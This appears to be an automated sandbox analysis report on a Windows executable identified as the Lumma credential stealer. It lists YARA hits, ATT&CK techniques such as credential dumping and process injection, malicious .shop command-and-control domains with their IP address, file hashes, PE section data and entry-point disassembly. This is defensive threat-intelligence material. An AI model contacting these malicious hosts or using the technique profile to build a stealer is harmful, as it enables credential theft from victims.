                Source: Yara matchFile source: 1.2.p37SE6gM52.exe.7ff6fc380000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000000.1324374308.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1728658450.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: p37SE6gM52.exe PID: 7324, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: p37SE6gM52.exe, type: SAMPLE
                Source: Yara matchFile source: 1.0.p37SE6gM52.exe.7ff6fc380000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.p37SE6gM52.exe.7ff6fc380000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000000.1324374308.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1728658450.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: p37SE6gM52.exe PID: 7324, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation
                1
                DLL Side-Loading
                311
                Process Injection
                1
                Masquerading
                OS Credential Dumping11
                Security Software Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                2
                Virtualization/Sandbox Evasion
                LSASS Memory2
                Virtualization/Sandbox Evasion
                Remote Desktop Protocol2
                Clipboard Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)311
                Process Injection
                Security Account Manager22
                System Information Discovery
                SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Deobfuscate/Decode Files or Information
                NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                Obfuscated Files or Information
                LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                p37SE6gM52.exe53%ReversingLabsWin64.Spyware.Lummastealer
                p37SE6gM52.exe100%AviraHEUR/AGEN.1326380
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://opentelemetry.io/schemas/1.26.0google.golang.org/genproto/protobuf/apigoogle.golang.org/prot0%Avira URL Cloudsafe
                pianoswimen.shop100%Avira URL Cloudmalware
                surroundeocw.shop100%Avira URL Cloudmalware
                priooozekw.shop100%Avira URL Cloudmalware
                https://racedsuitreow.shop/p100%Avira URL Cloudmalware
                https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
                https://racedsuitreow.shop/api100%Avira URL Cloudmalware
                racedsuitreow.shop100%Avira URL Cloudmalware
                https://racedsuitreow.shop/100%Avira URL Cloudmalware
                covvercilverow.shop100%Avira URL Cloudmalware
                https://github.com/golang/protobuf/issues/1609):0%Avira URL Cloudsafe
                pumpkinkwquo.shop100%Avira URL Cloudmalware
                abortinoiwiam.shop100%Avira URL Cloudmalware
                https://golang.org/doc/faq#nil_errorMemory0%Avira URL Cloudsafe
                https://github.com/uber-go/dig/issues/new0%Avira URL Cloudsafe
                deallyharvenw.shop100%Avira URL Cloudmalware
                https://protobuf.dev/reference/go/faq#namespace-conflictserver0%Avira URL Cloudsafe
                https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
                defenddsouneuw.shop100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                racedsuitreow.shop
                104.21.37.97
                truetrue
                  unknown
                  pianoswimen.shop
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    priooozekw.shoptrue
                    • Avira URL Cloud: malware
                    unknown
                    https://racedsuitreow.shop/apitrue
                    • Avira URL Cloud: malware
                    unknown
                    surroundeocw.shoptrue
                    • Avira URL Cloud: malware
                    unknown
                    racedsuitreow.shoptrue
                    • Avira URL Cloud: malware
                    unknown
                    pianoswimen.shoptrue
                    • Avira URL Cloud: malware
                    unknown
                    covvercilverow.shoptrue
                    • Avira URL Cloud: malware
                    unknown
                    pumpkinkwquo.shoptrue
                    • Avira URL Cloud: malware
                    unknown
                    abortinoiwiam.shoptrue
                    • Avira URL Cloud: malware
                    unknown
                    deallyharvenw.shoptrue
                    • Avira URL Cloud: malware
                    unknown
                    defenddsouneuw.shoptrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.cloudflare.com/learning/access-management/phishing-attack/BitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731554267.0000000002E45000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731193361.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731449847.0000000002E35000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://racedsuitreow.shop/pBitLockerToGo.exe, 00000004.00000002.1744682940.0000000002E0B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://racedsuitreow.shop/BitLockerToGo.exe, 00000004.00000002.1744682940.0000000002E0B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://opentelemetry.io/schemas/1.26.0google.golang.org/genproto/protobuf/apigoogle.golang.org/protp37SE6gM52.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://github.com/golang/protobuf/issues/1609):p37SE6gM52.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://github.com/uber-go/dig/issues/newp37SE6gM52.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://protobuf.dev/reference/go/faq#namespace-conflictserverp37SE6gM52.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://golang.org/doc/faq#nil_errorMemoryp37SE6gM52.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.cloudflare.com/5xx-error-landingBitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731193361.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731449847.0000000002E35000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    104.21.37.97
                    racedsuitreow.shopUnited States
                    13335CLOUDFLARENETUStrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1519287
                    Start date and time:2024-09-26 09:58:31 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 2s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:p37SE6gM52.exe
                    renamed because original name is a hash value
                    Original Sample Name:cd68144879cf39befd5d96950a78370d.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@3/0@2/1
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target p37SE6gM52.exe, PID 7324 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: p37SE6gM52.exe
                    TimeTypeDescription
                    05:06:04API Interceptor2x Sleep call for process: BitLockerToGo.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.21.37.97iq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                      file.exeGet hashmaliciousLummaCBrowse
                        LaWl4DY2kW.exeGet hashmaliciousLummaCBrowse
                          file.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                            File.exeGet hashmaliciousLummaCBrowse
                              SetupPowerGREP.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                  file.exeGet hashmaliciousLummaCBrowse
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        racedsuitreow.shopiq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                        • 104.21.37.97
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.37.97
                                        LcDQjpdIiU.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.206.221
                                        BLHvvl44N0.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                        • 172.67.206.221
                                        LcDQjpdIiU.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.206.221
                                        ptgl503.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.206.221
                                        0x000e00000001da78-93.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.206.221
                                        LaWl4DY2kW.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.37.97
                                        file.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                        • 104.21.37.97
                                        File.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.37.97
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUS3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.208.139
                                        HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                        • 104.21.17.90
                                        gvyO903Xmm.exeGet hashmaliciousFormBookBrowse
                                        • 104.21.70.136
                                        a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.58.182
                                        iq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                        • 104.21.37.97
                                        Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                        • 104.26.13.205
                                        QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        450230549.exeGet hashmaliciousAgentTeslaBrowse
                                        • 162.159.134.233
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        a0e9f5d64349fb13191bc781f81f42e13ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.37.97
                                        a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.37.97
                                        iq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                        • 104.21.37.97
                                        https://tiktoksc.tv/wapGet hashmaliciousUnknownBrowse
                                        • 104.21.37.97
                                        https://xtrafree.x10.mx/Get hashmaliciousUnknownBrowse
                                        • 104.21.37.97
                                        PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                        • 104.21.37.97
                                        PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                        • 104.21.37.97
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.37.97
                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                        • 104.21.37.97
                                        HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.37.97
                                        No context
                                        No created / dropped files found
                                        File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                        Entropy (8bit):6.299642646855827
                                        TrID:
                                        • Win64 Executable (generic) (12005/4) 74.95%
                                        • Generic Win/DOS Executable (2004/3) 12.51%
                                        • DOS Executable Generic (2002/1) 12.50%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                        File name:p37SE6gM52.exe
                                        File size:19'140'096 bytes
                                        MD5:cd68144879cf39befd5d96950a78370d
                                        SHA1:f22e8d8421fc6b41de89ab747c1c74b3e934ee2e
                                        SHA256:2ca1aa726259687599cbc1eac5cb922aa247ce62a537dc1506c95855f3e4322a
                                        SHA512:280fef539cc4d7f7055f2bd0e2d4a89216f7017cc09dad302db1ed24fd6ddcb8a7c0a6b40d741a20a057eb8b4965f33600d9cb40719e9714aa19ea1c8b2401cd
                                        SSDEEP:98304:oLWARUU+EelyitGR0xMZvo1VOfyvq6hzyjlEKaZI71zXCgMzDntPv:4+EelNttx4vMVDhaWK5CgoDt
                                        TLSH:AC173943F8A105E4C6ADD274C9629156BB71BC484B3427D72BA0F7283F72BC4AEB9750
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$......$................@............................. *.......$...`... ............................
                                        Icon Hash:9292849051581e12
                                        Entrypoint:0x1400014c0
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x140000000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                        TLS Callbacks:0x4084ee20, 0x1, 0x4084edf0, 0x1, 0x40852890, 0x1
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:1
                                        File Version Major:6
                                        File Version Minor:1
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:1
                                        Import Hash:4a438adb9d59c004dab9ec35016a1405
                                        Instruction
                                        dec eax
                                        sub esp, 28h
                                        dec eax
                                        mov eax, dword ptr [011D5CD5h]
                                        mov dword ptr [eax], 00000001h
                                        call 00007F3BB54557EFh
                                        nop
                                        nop
                                        dec eax
                                        add esp, 28h
                                        ret
                                        nop dword ptr [eax]
                                        dec eax
                                        sub esp, 28h
                                        dec eax
                                        mov eax, dword ptr [011D5CB5h]
                                        mov dword ptr [eax], 00000000h
                                        call 00007F3BB54557CFh
                                        nop
                                        nop
                                        dec eax
                                        add esp, 28h
                                        ret
                                        nop dword ptr [eax]
                                        dec eax
                                        sub esp, 28h
                                        call 00007F3BB5CAE22Ch
                                        dec eax
                                        test eax, eax
                                        sete al
                                        movzx eax, al
                                        neg eax
                                        dec eax
                                        add esp, 28h
                                        ret
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        dec eax
                                        lea ecx, dword ptr [00000009h]
                                        jmp 00007F3BB5455B09h
                                        nop dword ptr [eax+00h]
                                        ret
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        jmp dword ptr [eax]
                                        inc edi
                                        outsd
                                        and byte ptr [edx+75h], ah
                                        imul ebp, dword ptr [esp+20h], 203A4449h
                                        and cl, byte ptr [edx+47h]
                                        inc edi
                                        insd
                                        push edi
                                        xor dword ptr [eax+6Fh], edi
                                        arpl word ptr [eax+33h], di
                                        inc edx
                                        outsd
                                        inc edx
                                        dec esp
                                        jno 00007F3BB5455BA0h
                                        push ecx
                                        pop edi
                                        pop edi
                                        das
                                        dec ecx
                                        jbe 00007F3BB5455B86h
                                        inc esi
                                        push esp
                                        inc esi
                                        je 00007F3BB5455BABh
                                        imul esi, dword ptr [esp+esi*2], 4Ch
                                        bound ecx, dword ptr [ebp+70h]
                                        jp 00007F3BB5455B83h
                                        arpl word ptr [edx+2Fh], bx
                                        jbe 00007F3BB5455B95h
                                        jns 00007F3BB5455B93h
                                        js 00007F3BB5455B82h
                                        pop edx
                                        jns 00007F3BB5455B66h
                                        bound esp, dword ptr [ebx+33h]
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x12690000x4e.edata
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x126a0000x1438.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x126e0000x4eae.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x11d80000x34da0.pdata
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x12730000x2e78c.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x11d6b000x28.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x126a48c0x450.idata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x8593c00x8594001695d412edb6425eee8c9266304488f5unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .data0x85b0000x7ba100x7bc003e21f9f7e7885e1fd882591b2d15911bFalse0.2919625946969697dBase III DBT, version number 0, next free block index 10, 1st item "m/beorn7/perks\011v1.0.1\011h1:VlbKKnNfV8bJzeqoa4cOKqO6bYr3WgKZxO8Z16+hsOM="4.636654291084892IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rdata0x8d70000x9009500x900a00bb7c79532b0fc8ee2d10cfe5b63e7815unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                        .pdata0x11d80000x34da00x34e00ee1f5c63486867a792e2f5ef7dea3e15False0.40082003546099293data5.924052740433086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                        .xdata0x120d0000xc600xe005a2f6e2970c14461d07042a536ec36bbFalse0.26004464285714285data4.012516553303575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                        .bss0x120e0000x5a9200x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .edata0x12690000x4e0x200c2684334cca3c1408744ab422d5952d2False0.1328125data0.9168902136227094IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                        .idata0x126a0000x14380x16001b138f90f649a373b55b431ea7172e85False0.296875data4.5877140741561915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .CRT0x126c0000x700x2004703df60354c1e089ce631e168f831d3False0.0859375data0.48311337148086453IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .tls0x126d0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x126e0000x4eae0x500096680a6027fe0188a21dee2b50220bdaFalse0.174755859375data4.526328219663096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .reloc0x12730000x2e78c0x2e800f9d35a818d66bc881388cbfb28221ed6False0.16918682795698925data5.434058652189758IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0x126e1c00xca4PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.6393695920889988
                                        RT_ICON0x126ee640x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.025829875518672198
                                        RT_ICON0x127140c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.07129455909943715
                                        RT_ICON0x12724b40x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.1400709219858156
                                        RT_GROUP_ICON0x127291c0x3edata0.8064516129032258
                                        RT_VERSION0x127295c0x366data0.4160919540229885
                                        RT_MANIFEST0x1272cc40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                        DLLImport
